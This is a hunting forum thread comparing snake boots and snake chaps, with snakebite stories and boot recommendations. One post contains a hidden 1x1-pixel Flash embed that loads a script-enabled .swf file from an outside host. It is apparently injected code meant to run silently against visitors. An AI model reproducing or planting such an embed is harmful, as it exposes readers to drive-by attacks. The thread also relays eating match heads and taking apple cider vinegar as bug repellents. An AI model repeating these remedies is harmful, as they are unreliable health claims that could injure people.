Snake boots vs snake chaps

HarryO45

Mag dump Dirty Harry
Yeah I agree Harry the probability of being bitten is slim but I work in an ER and have seen Both copperhead and rattlesnake bites and they are not pretty LOL - I'm always in the woods but since seeing the outcome of snake bites it makes me nervous.

You are doing a great service to the community. Working in the ER...Respect. I don't think I could do that. God Bless You.

Better safe than sorry. I carry lots of Gatorade, my friend he thinks I'm crazy for that, he wears Snake Boots. ha! Differnt strokes.

Nicodemus

The Recluse
Staff member
I am gonna say it:

Never needed them. I have spent my entire youth in the woods. 28 years in the Army, about 15 years in the Infantry as a big league ground pounder - sometimes 45 days without going inside. Most of time in the SE or South America. Lots of field time...million chigger bites, sometimes hundreds of guys with me. I don't know of anyone being bit by a snake. Lots of Bee Stings. Snake Bites - I know it has happened, but not often - minuscule.

As a retiree I hunt and spend almost all my time in the Great Outdoors.

I don't worry about snakes as much as Heat Exhaustion. I believe heavy boots or chaps would increase that chance.

I have been Quail Hunting in Texas and the land owner made us where chaps, I like them for the sticker bushes...never had a problem with snakes, I saw them, but usually moving away. If i see them I used to kill them, now I let them live.

I too have spent my entire lifetime in the woods, and still do now that I`ve been retired for 7 years. When I was still on the workforce, my work kept me in viper country. In addition, I caught and sold venomous snakes for many years, starting back in the early 1970s. Up until a few years ago, everybody I snake hunted with had gotten bitten at least once, but one other and myself. Due to arthritis, I no longer trust my own strength to hold a big rattler or cottonmouth, so I let them go on their way in peace. But since the country I live, hunt, fish, and plunder in, has all 3 kinds of rattlers, both kinds of moccasins, and coral snakes, and the price of Crofab is astronomical for the pit vipers, I wear my snake boots, and urge others to do the same. :cheers:

As for ticks and redbugs, I haven`t had one since 1978, thanks to apple cider vinegar.

HarryO45

Mag dump Dirty Harry
I caught and sold venomous snakes for many years, starting back in the early 1970s...

As for ticks and redbugs, I haven`t had one since 1978, thanks to apple cider vinegar.

I think if I was chasing dangerous snakes and trying to catch them with my hands I would take extra precautions too. Curious, who did you sell the snakes to?

Crazy, the things we do. Huh?

For mosquitos / chiggers...bugs. We used to eat the match-heads off the packs ofmatches you get in C-rats/MREs... Sulfur or phosphorous they told us?...I think it might have helped but it took a while to get in your system.

I haven't done that in years. I use bug spray now. I got some good tips on this forum about some treatments / sprays that I plan to use this year.

Nicodemus

The Recluse
Staff member
I think if I was chasing dangerous snakes and trying to catch them with my hands I would take extra precautions too. Curious, who did you sell the snakes to?

Crazy, the things we do. Huh?

For mosquitos / chiggers...bugs. We used to eat the match-heads off the packs ofmatches you get in C-rats/MREs... Sulfur or phosphorous they told us?...I think it might have helped but it took a while to get in your system.

I haven't done that in years. I use bug spray now. I got some good tips on this forum about some treatments / sprays that I plan to use this year.

I sold most of mine at country stores that were buying points, sold a few to Silver Springs, some to Ross Allen, and even a few to Bill Haast.

Steve08

TRY the gators you will like them:)<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
+1 for the gators, very comfortable.

swamp hunter

Harry, I grew up hunting the Everglades , talk about Cottonmouths , I seen millions.
Never been bit and wore Tennis shoes most of the time cause your always in water up to your knees.
I didn't start wearin Leggings till about 10 years ago and the only reason I did was because I figured out a Life Flight Helo starts at 10 Grand $
Seems like the Folks that weren't raised around lots of snakes are the ones real afraid of them.
We just think of them as Lizards without legs...

ACracing98

Snakes are moving! I've seen 3 Eastern Diamondbacks in the last week and a half. Be careful!

JoPa

I bought a pair of snake guard leggings online from Acadamy, I think they were about $25. Very comfortable and not too bad to walk in during turkey.

rjcruiser

I'm a fan of snake boots over chaps. Only wear my chaps when rabbit hunting.

How does this work? Cover the bottom of your boots/pants in it?

take a tablespoon daily.

NCHillbilly

Administrator
Staff member
Never worn any in 50 years so far. Most of the folks I know personally who have gotten snake bit by a venomous snake they didn't see were bitten on the hands or arms. The rest were bitten messing with snakes- handling or trying to kill them.

Prefer Boots over Leggings. Chippewa are among the best. Watch where you sit, especially during turkey season! Most boots only cover up to just below your knees!

Killdee

Hey Nic you said in an earlier post about 3 kinds of moccasins. I didn't know there were 2?

Nicodemus

The Recluse
Staff member
You must be from around Thomasville

Originally from between Glenwood and Lumber City. Leesburg for the last 25 years.

Hey Nic you said in an earlier post about 3 kinds of moccasins. I didn't know there were 2?

Three kinds of rattlesnakes. There are only 2 species of moccasins, although they do have some slight regional variations.

Rich Kaminski

I like the Cabela's boots best. I also have 2 pair of chaps if anyone needs them. I am located in Marietta. I'll sell them cheap.